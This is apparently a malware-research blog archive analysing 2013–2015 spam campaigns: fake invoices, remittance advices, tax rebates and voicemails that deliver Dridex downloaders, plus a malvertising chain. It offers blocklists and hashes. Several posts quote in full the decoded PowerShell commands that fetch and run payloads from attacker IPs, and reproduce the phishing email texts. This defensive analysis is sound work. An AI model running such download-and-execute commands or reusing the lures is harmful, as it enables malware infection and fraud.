Sponsored by..

Showing posts with label TheFirst-RU. Show all posts
Showing posts with label TheFirst-RU. Show all posts

Wednesday, 1 April 2015

Malware spam: "Your Remittance Advice COMPANY NAME"

Yet another malware spam run today, this time from randomly-named but legitimate companies, for example:

From:    Kate Coffey
Date:    1 April 2015 at 15:00
Subject:    Your Remittance Advice PEEL SOUTH EAST

Dear sir or Madam,

Please find attached a remittance advice (JT934IYIP.doc) for your information.
Should you need any further information, please do not hesitate to contact us.

Best regards
PEEL SOUTH EAST

Attached is a Word document with a filename matching the body one in the text. Every email attachment we have seen so far is slightly different, but there seem to be just two different malicious macros [1] [2] [pastebin] which download a component from one of the following locations:

http://31.41.45.175/sqwere/casma.gif
http://91.242.163.78/sqwere/casma.gif


Those servers are almost certainly entirely malicious, with IPs assigned to:

31.41.45.175 (Relink Ltd, Russia)
91.242.163.78 (Sysmedia, Russia)

This file is saved as %TEMP%\DOWUIAAFQTA.exe and has a VirusTotal detection rate of 4/49. Automated analysis tools [1] [2] [3] show attempted connections to:

188.120.225.17 (TheFirst-RU, Russia)
45.55.154.235 (Digital Ocean, US)
188.126.72.179 (Portlane AB, Sweden)
1.164.114.195 (Data Communication Business Group, Taiwan)
46.19.143.151 (Private Layer Inc, Switzerland)
79.149.162.117 (Telefonica Moviles Espana, Spain)
5.135.28.104 (OVH / Simpace.com, UK)

According to this Malwr report it downloads the same Dridex DLL as seen in this spam run plus another variant of the downloader with a detection rate of 3/56.

Recommended blocklist:
188.120.225.17
45.55.154.235
188.126.72.179
1.164.114.195
46.19.143.151
79.149.162.117
5.135.28.104/29
31.41.45.175
91.242.163.78

MD5s:
b4be0bb41af791004ae3502c5531773b
7bede7cc84388fb7bfa2895dba183a20
564597fd05a31456350bac5e6c075fc9

Malware spam "Unpaid Invoice [09876] attached" / "This is your Remittance Advice [ID:12345]" with VBS-in-ZIP attachment

This rather terse spam has no body text and comes from random senders. It has a ZIP attachment which contains a malicious script.

Example subjects include:
Unpaid Invoice [09323] attached
Unpaid Invoice [86633] attached
Unpaid Invoice [35893] attached
This is your Remittance Advice [ID:42667]
This is your Remittance Advice [ID:69951]

Example senders:
SAROSSA PLC
32RED
NOIDA TOLL BRIDGE CO

Example attachment names:
RC422QNSB.zip
ML82034PMRY.zip
MK843NCAK.zip
OI8244LPNH.zip
ZW1760EHOG.zip
MANX FINANCIAL GROUP PLC
RARE EARTH MINERALS PLC

Inside is a malicious VBS script. It is likely that there are several different versions, the one working sample I saw looked like this [pastebin] which is very similar to the VBA macro used in this spam run yesterday.

When run (I don't recommend this!) it executes the following command:
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile  -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.202/sqwere/casma.gif','%TEMP%\giuguiGIUGdsuf87t6F.cab'); expand %TEMP%\giuguiGIUGdsuf87t6F.cab %TEMP%\giuguiGIUGdsuf87t6F.exe; Start-Process %TEMP%\giuguiGIUGdsuf87t6F.exe;
Because there are probably several different versions of this script, there are probably several different download locations. In this case, a fake .GIF file is downloaded from a malware server at 193.26.217.202 (Servachok Ltd, Russia) which is actually an .EXE file, but it gets saved as a .CAB file. For no very good reason it is passed through EXPAND which does nothing but save it to %TEMP%\giuguiGIUGdsuf87t6F.exe.

This binary has a detection rate of 4/55. Automated analysis tools [1] [2] [3] [4] show that the malware attempts to phone home to:

188.120.225.17 (TheFirst-RU, Russia)
121.50.43.175 (Tsukaeru.net, Japan)
82.151.131.129 (DorukNet, Turkey)
92.63.88.83 (MWTV, Latvia)
95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
199.201.121.169 (Synaptica, Canada)
188.226.129.49 (Digital Ocean, Netherlands)
192.64.11.232 (Synaptica, Canada)
77.74.103.150 (iway AG GS, Switzerland)
1.164.114.195 (Data Communication Business Group, Taiwan)
5.135.28.104 (OVH / Simpace.com, UK)
46.19.143.151 (Private Layer Inc, Switzerland)

It also drops another variant of the same downloader, edg1.exe with a detection rate of 3/56 and a Dridex DLL with a detection rate of 9/56.

Recommended blocklist:
188.120.225.17
121.50.43.175
82.151.131.129
92.63.88.0/24
95.163.121.0/24
199.201.121.169
188.226.129.49
192.64.11.232
77.74.103.150
1.164.114.195
5.135.28.104/29
46.19.143.151

Tuesday, 31 March 2015

Malware spam: "83433-Your Latest Documents from RS Components 659751716"

This very convincing looking email pretending to be from RS has a malicious attachment. Although the email looks genuine, it is a simple forgery. RS are not sending out this email, nor have their systems been compromised in any way.

---------------------------------------------------------------

From:    Earlene Carlson
Date:    31 March 2015 at 11:30
Subject:    83433-Your Latest Documents from RS Components 659751716

RS Online Helping you get your job done.
You've received this email as a customer of rswww.com.


Dear Customer,


Please find attached your latest document(s) from RS.


Account Number
Date
Invoice Number
Document Total
Document Type
49487999
31-Mar-2015
659751716
£1133.90  
Invoice



For all account queries please contact RS Customer Account Services.

Tel: 01536 752867
Fax: 01536 542205
Email: rpdf.billing@colt.net (subject box to read DOC eBilling)


If you have any technical problems retrieving your documents please contact Swiss Post Solutions Helpdesk on the following:

Tel: 0333 8727520
Email: customers@colt.net


Kind regards,

RS Customer Account Services.


This service is provided by Swiss Post Solutions on behalf of RS Components.
Helping you get
your job done


RS Components Ltd, Birchington Road, Weldon, Corby, Northants, NN17 9RS, UK.
Registered No. 1002091. http://rswww.com. RS Online Help: 01536 752867.

---------------------------------------------------------------

The reference numbers, names and email addresses vary, but all come with a malicious and apparently randomly-named attachment (e.g. G-A6298638294134271075684-1.doc).

There are probably several different variants of this, but I have seen just one working example of the attachment which contains this malicious macro [pastebin] which executes the following command:

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://185.91.175.64/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;
For some reason, the EXE is download from http://185.91.175.64/jsaxo8u/g39b2cx.exe with a CAB extension and then run through EXPAND which.. errr.. does nothing much. The file is saved as %TEMP%\4543543.exe, and it has a VirusTotal detection rate of 3/57.

Analysis is still pending, but the VirusTotal report does indicate the malware phone home to 188.120.225.17 (TheFirst-RU, Russia) which I strongly recommend blocking, check back for more updates later.

UPDATE:
Automated analysis [1] [2] [3] [4] show attempted connections to the following IPs:

188.120.225.17 (TheFirst-RU, Russia)
1.164.114.195 (Data Communication Business Group, Taiwan)
2.194.41.9 (Telecom Italia Mobile, Italy)
46.19.143.151 (Private Layer INC, Switzerland)
199.201.121.169 (Synaptica, Canada)

It also drops another version of the downloader binary called edg1.exe with a 2/57 detection rate plus a Dridex DLL with a detection rate of 1/57.

Recommended blocklist:
188.120.225.17
1.164.114.195
2.194.41.9
46.19.143.151
199.201.121.169

Wednesday, 11 March 2015

Malware spam: "Voicemail Message (07813297716) From:07813297716"

When was the last time someone sent you a voice mail message by email? Never? There are no surprises to find that this spam email message has a malicious attachment.
From:     Voicemail admin@victimdomain
Date:     11/03/2015 11:48
Subject:     Voicemail Message (07813297716) From:07813297716

IP Office Voicemail redirected message

Attachment: MSG00311.WAV.ZIP
The attachment is a ZIP file containing a malicious EXE file called MSG00311.WAV.exe which has a VirusTotal detection rate of 5/57. According to the Malwr report, it pulls down another executable and some config files from:

http://wqg64j0ei.homepage.t-online.de/data/log.exe
http://cosmeticvet.su/conlib.php

This behaviour is very much like a Dridex downloader, a campaign that has mostly been using malicous macros rather than EXE-in-ZIP attacks.

The executable it drops has a detection rate of 2/54 and these Malwr reports [1] [2] show a further component download from:

http://muscleshop15.ru/js/jre.exe
http://test1.thienduongweb.com/js/jre.exe


This component has a detection rate of 5/57. According to the Malwr report for that we see (among other things) that it drops a DLL with a detection rate of 4/57 which is the same Dridex binary we've been seeing all day.

Piecing together the IP addresses found in those reports combined with some information from one of my intelligence feeds, we can see that the following IPs are involved in this activity:

31.41.45.211 (Relink Ltd, Russia)
62.213.67.115 (Caravan Telecom, Russia)
80.150.6.138 (Deutsche Telekom, Germany)
42.117.1.88 (FPT Telecom Company, Vietnam)
188.225.77.242 (TimeWeb Co. Ltd., Russia)
212.224.113.144 (First Colo GmbH, Germany)
37.59.50.19 (OVH, France)
62.76.179.44 (Clodo-Cloud, Russia)
95.163.121.200 (Digital Networks CJSC aka DINETHOSTING, Russia)
185.25.150.33 (NetDC.pl, Poland)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)

Recommended blocklist:
31.41.45.211
62.213.67.115
80.150.6.138
42.117.1.88
188.225.77.242
212.224.113.144
37.59.50.19
62.76.179.44
95.163.121.0/24
185.25.150.3
104.232.32.119
188.120.243.159




Malware spam: Message from "RNP0026735991E2" / "inv.09.03"

This pair of spam emails are closely related and have a malicious attachment:

From:    admin.scanner@victimdomain
Date:    11 March 2015 at 08:49
Subject:    Message from "RNP0026735991E2"

This E-mail was sent from "RNP0026735991E2" (MP C305).

Scan Date: 11.03.2015 08:57:25 (+0100)
Queries to: admin.scanner@victimdomain

Attachment: 201503071457.xls
----------

From:    Jora Service [jora.service@yahoo.com]
Date:    11 March 2015 at 09:27
Subject:    inv.09.03

Attachment: INV 86-09.03.2015.xls

Neither XLS attachment is currently detected by AV vendors [1] [2] and they contain two related but slightly different macros [1] [2] which download a component from the following locations:

http://koschudu.homepage.t-online.de/js/bin.exe
http://03404eb.netsolhost.com/js/bin.exe

The file is then saved as %TEMP%\fJChjfgD675eDTU.exe  which has a VirusTotal detection rate of 3/57. According to this Malwr report, it attempts to connect to the following IPs:

188.225.77.216 (TimeWeb Co. Ltd, Russia)
42.117.1.88 (FPT Telecom Company, Vietnam)
31.41.45.211 (Relink Ltd, Russia)
87.236.215.103 (OneGbits, Lithuania)
104.232.32.119 (Net3, US)
188.120.243.159 (TheFirst.RU, Russia)

It also drops a couple more malicious binaries with the following MD5s:

8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]
53ba28120a193e53fa09b057cc1cbfa2 [VT 4/57]

Recommended blocklist:
188.225.77.216
42.117.1.88
31.41.45.211
87.236.215.103
104.232.32.119
188.120.243.159

Malware spam: BACS "Remittance Advice" / HMRC "Your Tax rebate"

These two malware spam runs are aimed at UK victims, pretending to be either a tax rebate or a BACS payment.

From:    Long Fletcher
Date:    11 March 2015 at 09:44
Subject:    Remittance Advice

Good Morning,

Please find attached the BACS Remittance Advice for payment made by RENEW HLDGS.

Please note this may show on your account as a payment reference of FPALSDB.

Kind Regards
Long Fletcher
Finance Coordinator


Attachment: LSDB.xls

----------

From:    Vaughn Baker
Date:    11 March 2015 at 09:27
Subject:    Your Remittance Advice [FPABHKZCNZ]

Good Morning,

Please find attached the BACS Remittance Advice for payment made by JD SPORTS FASHION PLC.

Please note this may show on your account as a payment reference of FPABHKZCNZ.

Kind Regards
Vaughn Baker
Senior Accountant

----------

From:    HMRC
Date:    11 March 2015 at 10:04
Subject:    Your Tax rebate

Dear [redacted],

After the last yearly computations of your financial functioning we have defined that you have the right to obtain a tax rebate of 934.80. Please confirm the tax rebate claim and permit us have 6-9 days so that we execute it. A rebate can be postponed for a variety of reasons. For instance confirming unfounded data or applying not in time.

To access the form for your tax rebate, view the report attached. Document Reference: (196XQBK).

Regards, HM Revenue Service. We apologize for the inconvenience.

The security and confidentiality of your personal information is important for us. If you have any questions, please either call the toll-free customer service phone number.
© 2014, all rights reserved

Sample attachment names:

HMRC: 196XQBK.xls, 89WDZ.xls
BACS: LSDB.xls, Rem_8392TN.xml (note that this is actually an Excel document, not an XML file)

All of these documents have low detection rates [1] [2] [3] [4] and contain these very similar malicious macros (containing sandbox detection algorithms) [1] [2] [3] [4] which when decrypted attempt to run the following Powershell commands:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.39/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://93.170.123.36/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.190/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.177/asdvx/fghs.php','%TEMP%\dsfsdFFFv.cab'); expand %TEMP%\dsfsdFFFv.cab %TEMP%\dsfsdFFFv.exe; start %TEMP%\dsfsdFFFv.exe;
These are probably compromised hosts, for the record they are:

193.26.217.39 (Servachok Ltd, Russia)
93.170.123.36 (PE Gornostay Mikhailo Ivanovich, Ukraine)
85.143.166.190 (Pirix, Russia)
46.30.42.177 (EuroByte / Webazilla, Russia)

These download a CAB file, and then expand and execute it. This EXE has a detection rate of 4/57 and automated analysis tools [1] [2] show attempted traffic to:

95.163.121.33 (Digital Networks aka DINETHOSTING, Russia)
188.120.226.6 (TheFirst.RU, Russia)
188.165.5.194 (OVH, France)

According to this Malwr report it drops two further malicious files with the following MD5s:

c6cdf73eb5d11ac545f291bc668fd7fe
8d3a1903358c5f3700ffde113b93dea6 [VT 2/56]

Recommended blocklist:
95.163.121.0/24
188.120.226.6
188.165.5.194
193.26.217.39
93.170.123.36
85.143.166.190
46.30.42.177



Friday, 23 January 2015

Malware spam: "IRS Fiscal Activity 531065" / "support@irsuk.co"

This fake IRS spam actually does use the irsuk.co domain to host malware.

From:    IRS [support@irsuk.co]
Date:    23 January 2015 at 11:46
Subject:    IRS Fiscal Activity 531065

Hello, [redacted].

We notify you that last year, according to the estimates of tax taxation,
we had a shortage of means.
We ask you to install the special program with new digital certificates,
what to eliminate an error.

To install the program go to the link above:
http://irsuk.co/DownloadIRSService/SetupIRS2015.zip


Thanks
Intrenal Revenue Sevrice
London W1K 6AH
United Kingdom
The ZIP file contains a malicious executable SetupIRS2015.exe  which has a VirusTotal detection rate of 8/53. The irsuk.co site is hosted on 89.108.88.9 (Agava Ltd, Russia). The Malwr report shows it phoning home to garbux.com (78.24.219.6 - TheFirst-RU, Russia)

The WHOIS details for the domain are almost definitely fake, but kind of interesting..

Registrant ID:               CR185450554
Registrant Name:             Thomas McCaffrey
Registrant Organization:     Real Help Communications, Inc.
Registrant Address1:         3023 Anzac Avenue
Registrant City:             Roslyn
Registrant State/Province:   Pennsylvania
Registrant Postal Code:      19001
Registrant Country:          United States
Registrant Country Code:     US
Registrant Phone Number:     +1.2158872818
Registrant Email:            tom@realhelp.net


They're interesting because these really are the valid contact details for Real Help Communcations, Inc which makes me wonder if their domain account at GoDaddy has been compromised.

A look at 89.108.88.9 shows there is only one active website on that IP address (irsuk.co) , but the host on the IP identifies itself as ukirsgov.com which is a domain created on the same day (2015-01-19) but has been suspended due to invalid WHOIS details (somebody at csc.com), which was hosted on a Bosnian IP of 109.105.193.99 (Team Consulting d.o.o.).That IP is identified as malicious by VirusTotal with a number of bad domains and binaries.

The malware POSTS to garbux.com which Sophos identifies as a characteristic of the generically-named Troj/Agent-ALHF.

Overall, automated analysis tools are not very clear about what this malware does [1] [2] [3] [4] [5] although you can guarantee it is nothing good.

Recommended blocklist:
89.108.88.9
78.24.219.6
109.105.193.99
irsuk.co
garbux.com
ukirsgov.com
updateimage.ru
getimgdcenter.ru
agensiaentrate.it
freeimagehost.ru




Friday, 21 March 2014

Porn site beeg.com hacked, aadserver.com and malware sites to block

The folks at Malwarebytes posted an exellent and interesting blog entry on the hack of porn site beeg.com. The technical analysis is spot on.. but sometimes you need actionable intelligence too.

Let's rush towards the climax of the infection chain for a moment. Malwarebytes identify a couple of malicious domains, both hosted on 92.63.109.45 (TheFirst-RU, Russia).

mdquhrp.clark4houk.eu
ipquqoh.lapierre3dudley.eu

Source: Malwarebytes blog
That IP actually contains a lot more bad domains that have all been recently registered with hidden details:

mdquhrp.clark4houk.eu
boqmkwe.lapierre3dudley.eu
wjlxuxt.artola1brodgen.eu
jqeqt.kundel2klimas.eu
ocsck.amar1krauel.eu
qeuhn.kusmider3bossert.eu
ipquqoh.lapierre3dudley.eu
mnsblx.kempffer7hazeldine.eu
alxrjqo.julian7hoscheid.eu
nnmkeseu.clark4houk.eu
jtwwnu.amar1krauel.eu
wbxrufy.hsiang4akai.eu
tanhts.contardo1jak.eu
gcumqix.hazen1ceponis.eu
lgyqyfos.kundel2klimas.eu
qymvauk.artola1brodgen.eu
rugoo.farant4diperna.eu
iyttjqaa.farant4diperna.eu
ekgdb.julian7hoscheid.eu
bteqspe.labranche9allan.eu
pwdulvt.labranche9allan.eu
noslpt.eriksson5akhavan.eu
ywata.kusmider3bossert.eu
yqovf.lamirande9buhler.eu
oidgvrz.kepekci8billoteau.eu
www.kundel2klimas.eu

But how did visitors get delivered to the payload site in the first place? The previous step in the Malwarebytes chain was a site called miofitching3.com on 217.174.108.33 (Domishko Hosting, Russia). A look at the sites recently hosted on that IP shows the following:

aadserver.com
miofetcher1.com
miofitching3.com
miofleiming1.com
miofleiming2.com
miofleiming3.com
miofleiming4.com
miofleiming5.com
miofleiming6.com

One of these things is not like the others. Yes, aadserver.com doesn't match. But the name makes it sound like an advertising network. The domain has hidden WHOIS details but was only registered on 13th February.

A look around the aadserver.com site shows something that looks slick.




It looks slick, but the spelling is terrible and some of the body text has been copied from Wikipedia.. even including a [citation needed] tag. The email contact details are all free webmail providers, and despite promoting itself as an "Australian Ad Server" it has a Russian IP address.

It's pretty obvious that aadserver.com is a fake. The Russian IP address (odd for an Australian business), recent domain registration with hidden WHOIS details, email addresses and poor spelling should have been red flags for an experience media buyer.

So how did these ads end up on beeg.com? Well, if we go back to the first step in the infection chain, we see a reference to a site staticloads.com. This has the same WHOIS details as beeg.com, so my best guess it that the owners of beeg.com were contacted by aadserver.com with a proposition to sell advertising, and a lack of expertise led to fake ads being placed on the site.

So, I mentioned actionable intelligence. Apart from making sure that you properly train media buyers in detecting fake ad agencies, I would strongly recommend applying the following blocklist to your networks to stop any more bad ads from these criminals causing a problems:

92.63.109.45
217.174.108.33
clark4houk.eu
lapierre3dudley.eu
artola1brodgen.eu
kundel2klimas.eu
amar1krauel.eu
kusmider3bossert.eu
kempffer7hazeldine.eu
julian7hoscheid.eu
hsiang4akai.eu
contardo1jak.eu
hazen1ceponis.eu
farant4diperna.eu
labranche9allan.eu
eriksson5akhavan.eu
lamirande9buhler.eu
kepekci8billoteau.eu
aadserver.com
miofetcher1.com
miofitching3.com
miofleiming1.com
miofleiming2.com
miofleiming3.com
miofleiming4.com
miofleiming5.com
miofleiming6.com

Tuesday, 2 July 2013

Malware sites to block 2/7/13

These sites belong to this gang and house exploit kits and other nastiness. I've broken the list down into three sections: IPs and web hosts, plain IPs (for copy and pasting) and malware domains. The domains change on a regular basis, the IPs less frequently and are therefore probably the best things to block.

37.123.103.159 (Salay Telekomunikasyon, Turkey)
38.64.161.163 (Stratonexus Technologies Corp, Canada)
58.196.7.174 (CERNET, China)
77.237.190.22 (Parsun Network Solutions, Iran)
77.240.118.69 (Acens Technologies, Spain)
78.108.86.169 (Majordomo LLC, Russia)
85.214.53.47 (Strato AG, Germany)
87.255.149.99 (Societe Francaise du Radiotelephone, France)
88.81.239.98 (Top Net PJSC, Ukraine)
88.86.100.2 (Supernetwork, Czech Republic)
89.248.161.148 (Ecatel, Netherlands)
95.111.32.249 (Mobitel EAD, Bulgaria)
98.223.199.185 (Comcast Communications, US)
108.174.61.198 (FTN Services, US)
108.177.140.2 (Nobis Technology Group, US)
113.161.207.101 (VietNam Post and Telecom Corporation, Vietnam)
114.4.27.219 (IDIA Kantor Arsip, Indonesia)
114.130.5.145 (MANGO CA Service, Bangladesh)
119.147.137.31 (China Telecom, China)
120.124.28.131 (TANet, Taiwan)
124.232.165.52 (China Telecom, China)
134.159.143.12 (Telstra Telewhite, Hong Kong)
140.122.184.45 (TANet, Taiwan)
140.135.112.169 (TANet, Taiwan)
151.155.25.111 (Novell, US)
172.245.216.69 (Colocrossing, US)
172.246.122.110 (Enzu Inc, US)
173.232.105.66 (Blue Deals Fly, US)
174.140.166.239 (Directspace, US)
176.67.10.163 (McLaut ISP, Ukraine)
178.211.46.123 (Radore Veri Merkezi Hizmetleri, Turkey)
181.54.174.204 (Telmex Colombia, Colombia)
186.103.163.222 (Telefonica Empresas, Chile)
186.227.53.43 (Via Cabo Provedor de Internet e Informática, Brazil)
188.32.153.31 (National Cable Networks, Russia)
188.120.235.236 (TheFirst-RU, Russia)
189.1.144.243 (Silva & Silveira, Brazil)
195.241.208.160 (Koninklijke / Tiscali / Telfort, Netherlands)
198.46.136.86 (New Wave NetConnect, US)
202.56.170.28 (Ning Internet, Indonesia)
203.80.17.155 (MYREN, Malaysia)
203.185.97.126 (ThaiSARN, Thailand)
208.81.165.252 (Gamewave Hongkong Holdings, US)
210.42.103.141 (CERNET, China)


37.123.103.159
38.64.161.163
58.196.7.174
77.237.190.22
77.240.118.69
78.108.86.169
85.214.53.47
87.255.149.99
88.81.239.98
88.86.100.2
89.248.161.148
95.111.32.249
98.223.199.185
108.174.61.198
108.177.140.2
113.161.207.101
114.4.27.219
114.130.5.145
119.147.137.31
120.124.28.131
124.232.165.52
134.159.143.12
140.122.184.45
140.135.112.169
151.155.25.111
172.245.216.69
172.246.122.110
173.232.105.66
174.140.166.239
176.67.10.163
178.211.46.123
181.54.174.204
186.103.163.222
186.227.53.43
188.32.153.31
188.120.235.236
189.1.144.243
195.241.208.160
198.46.136.86
202.56.170.28
203.80.17.155
203.185.97.126
208.81.165.252
210.42.103.141


101ndstreetymha.com
abacs.pl
addressadatal.net
afabind.com
all24hours.net
amimeseason.net
andertiua200.com
antidoctorpj.com
antitationed200.com
auditbodies.net
avastsurveyor.com
bebomsn.net
beirutyinfo.comu
bermudcity.net
bestsloankettering.com
biati.net
blackragnarok.net
blindsay-law.net
boats-sale.net
boyd-lawyer.net
brasilmatics.net
buycushion.net
cardpalooza.su
chairsantique.net
chinadollars.net
ciriengrozniyivdd.ru
cirienkoidrugied50.ru
cocainism.net
condalinarad72234652.ru
condalinaradushko.ru
condalinaradushko5.ru
condalinneuwu5.ru
condalinra2735.ru
condalinradishevo.ru
condalnua745746.ru
condalnuashyochetto.ru
confideracia.ru
controlnieprognoz.ru
cyberwoodlike.com
dirvers.net
dollsinterfer.net
doorandstoned.com
drivesr.com
dulethcentury.net
e-eleves.net
ehchernomorskihu.ru
ehnihjrkenpj.ru
ehnihujasebejav15.ru
ehnutidalvchedu.ru
ejoingrespubldpl.ru
elrrueitoenidd10.ru
enway.pl
ergopets.com
ermitajohrmited.ru
ernutkskiepro.ru
estimateddeta.com
extichetvorish.ru
fenvid.com
firefoxupd.pw
garohoviesupi.ru
gatoversignie.ru
genown.ru
ghroumingoviede.ru
gindonszkjchaijj.ru
gnanisienviwjunlp.ru
gondatskenbiehu.ru
gorondibndiiend10.ru
greli.net
gromimolniushed.ru
gstoryofmygame.ru
headbuttingfo.net
heavygear.net
heidipinks.com
highsecure155.com
historuronded.com
hotamortisation.net
hotkoyou.net
huang.pl
iberiti.com
icensol.net
independinsy.net
ingrestrained.com
insectiore.net
inutesnetworks.su
itracrions.pl
joinproportio.com
jsecure5.com
letsgofit.net
linguaape.net
lmbcakes.com
mantrapura.net
metalcrew.net
meticulousmus.net
meynerlandislaw.net
mifiesta.ru
mmafightsearch.net
myfreecamgirls.net
newtimedescriptor.com
obovate.net
ochengorit.ru
outbounduk.net
oxfordxtg.net
oydahrenlitutskazata.ru
patrihotel.net
patriotskit.ru
pc-liquidations.net
peertag.com
photosuitechos.su
pinterest.com.reports0701.net
pizdecnujzno.ru
pleak.pl
pnpnews.net
porschetr-ml.com
potteryconvention.ru
radiovaweonearch.com
ratenames.net
recorderbooks.net
rentipod.ru
reportingglan.com
reports0701.net
reveck.com
safe-browser.biz
safe-time.net
sartorilaw.net
secrettapess.com
secureaction120.com
securepanel35.com
sendkick.com
sensetegej100.com
shopkeepersne.net
smartsecurity-app.com
soberimages.com
spanishafair.com
stilos.pl
susubaby.net
televisionhunter.com
time-update.net
toldia.com
trleaart.net
ukbash.ru
unabox.pl
unitmusiceditior.com
unreality.biz
vahvahchicas.ru
wic-office.com
widnows.net
winne2000.net
winodwsupd.pw
winudpater.com
wow-included.com
xenaidaivanov.ru
zoneagainstre.com

Thursday, 18 April 2013

Malware sites to block 18/4/13, revisited

Quite late last night I posted some malicious IP address that I recommend blocking. I've had a chance to look at these more deeply, and some of them are in known bad IP ranges that you should consider blocking.

Most of these IP ranges are in Russia, blocking them will probably block some legitimate sites. If you don't do much business with Russia then it will probably not be an issue, if you do then you should exercise caution. There's a plain list at the bottom if you simply want to copy-and-paste.


Detected IP Recommended block Owner
5.9.191.179 5.9.191.160/26 (CyberTech LLC, Russia / Hetzner, Germany)
5.45.183.91 5.45.183.91 (Bradler & Krantz, Germany)
5.135.67.215 5.135.67.208/28 (MMuskatov-IE / OVH, France)
5.135.67.217

23.19.87.38 23.19.87.32/29 (Di & Omano Ltd, Germany / Nobis Technology, US)
37.230.112.83 37.230.112.0/23 (TheFirst-RU, Russia)
46.4.179.127 46.4.179.64/26 (Viacheslav Krivosheev, Russia / Hetzner Germany)
46.4.179.129

46.4.179.130

46.4.179.135

46.37.165.71 46.37.165.71 (BurstNET, UK)
46.37.165.104 46.37.165.104 (BurstNET, UK)
46.105.162.112 46.105.162.112/26 (Shah Sidharth, US / OVH, France)
62.109.24.144 62.109.24.0/22 (TheFirst-RU, Russia)
62.109.26.62

62.109.27.27

80.67.3.124 80.67.3.124 (Portlane Networks, Sweden)
80.78.245.100 80.78.245.0/24 (Agava JSC, Russia)
91.220.131.175 91.220.131.0/24 (teterin Igor Ahmatovich, Russia)
91.220.131.178

91.220.163.24 91.220.163.0/24 (Olevan plus, Ukraine)
94.250.248.225 94.250.248.0/23 (TheFirst-RU, Russia)
108.170.4.46 108.170.4.46 (Secured Servers, US)
109.235.50.213 109.235.50.213 (xenEurope, Netherlands)
146.185.255.97 146.185.255.0/24 (Petersburg Internet Network, Russia)
146.185.255.207

149.154.64.161 149.154.64.0/23 (TheFirst-RU, Russia)
149.154.65.56

149.154.68.145 149.154.68.0/23 (TheFirst-RU, Russia)
173.208.164.38 173.208.164.38 (Wholesale Internet, US)
173.234.239.168 173.234.239.160/27 (End of Reality LLC, US / Nobis, US)
176.31.191.138 176.31.191.138 (OVH, France)
176.31.216.137 176.31.216.137 (OVH, France)
184.82.27.12 184.82.27.12 (Prime Directive LLC, US)
188.93.211.57 188.93.210.0/23 (Logol.ru, Russia)
188.120.238.230 188.120.224.0/20 (TheFirst-RU, Russia)
188.120.239.132

188.165.95.112 188.165.95.112/28 (Shah Sidharth, US / OVH France)
188.225.33.62 188.225.33.0/24 (Transit Telecom, Russia)
188.225.33.117

192.210.223.101 192.210.223.101 (VPS Ace, US / ColoCrossing, US)
193.106.28.242 193.106.28.242 (Centr Informacionnyh Technologii Online, Ukraine)
193.169.52.144 193.169.52.0/23 (Promobit, Russia)
195.3.145.99 195.3.145.99 (RN Data, Latvia)
195.3.147.150 195.3.147.150 (RN Data, Latvia)
198.23.250.142 198.23.250.142 (LiquidSolutions, Bulgaria / ColoCrossing, US)
198.46.157.174 198.46.157.174 (Warfront Cafe LLC, US / ColoCrossing, US)
205.234.204.151 205.234.204.151 (HostForWeb, US)
205.234.204.190 205.234.204.190 (HostForWeb, US)
205.234.253.218 205.234.253.218 (HostForWeb, US)
213.229.69.40 213.229.69.40 (Poundhost, UK / Simply Transit, UK)

5.9.191.160/26
5.45.183.91
5.135.67.208/28
23.19.87.32/29
37.230.112.0/23
46.4.179.64/26
46.37.165.71
46.37.165.104
46.105.162.112/26
62.109.24.0/22
80.67.3.124
80.78.245.0/24
91.220.131.0/24
91.220.163.0/24
94.250.248.0/23
108.170.4.46
109.235.50.213
146.185.255.0/24
149.154.64.0/23
149.154.68.0/23
173.208.164.38
173.234.239.160/27
176.31.191.138
176.31.216.137
184.82.27.12
188.93.210.0/23
188.120.224.0/20
188.165.95.112/28
188.225.33.0/24
192.210.223.101
193.106.28.242
193.169.52.0/23
195.3.145.99
195.3.147.150
198.23.250.142
198.46.157.174
205.234.204.151
205.234.204.190
205.234.253.218
213.229.69.40

Thursday, 7 March 2013

BBB Spam / alteshotel.net and bbb-accredited.net

This fake BBB spam leads to malware onalteshotel.net and bbb-accredited.net:


Date:      Thu, 7 Mar 2013 06:23:12 -0700
From:      "Better Business Bureau Warnings" [hurriese3@bbb.com]
Subject:      BBB details regarding your claim No.

Sorry, your e-mail does not support HTML format. Your messages can be viewed in your browser
Better Business Bureau ©
Start With Trust ©

Thu, 6 March 2013

Your Accreditation Suspended

[redacted]

The Better Business Bureau has been temporary Aborted Your Accreditation
A number of latest complains on you / your company motivated us to temporal Abort your accreditation with Better Business Beaureau. The details of the our decision are available for review at a link below. Please pay attention to this issue and inform us about your glance as soon as possible.

We graciously ask you to overview the TERMINATION REPORT to meet on this claim

We awaits to your prompt rebound.

If you think you got this email by mistake - please forward this message to your principal or accountant

Yours respectfully
Hunter Ross
Dispute Advisor
Better Business Bureau

Better Business Bureau
3053 Wilson Blvd, Suite 600 Arlington, VA 25501
Phone: 1 (703) 276.0100 Fax: 1 (703) 525.8277

This information was sent to [redacted]. Don't want to receive these emails anymore? You can unsubscribe

=========================


Date:      Thu, 7 Mar 2013 21:19:18 +0800
From:      "Better Business Bureau Warnings" [prettifyingde7@transfers.americanpayroll.org]
Subject:      BBB details about your pretense No.

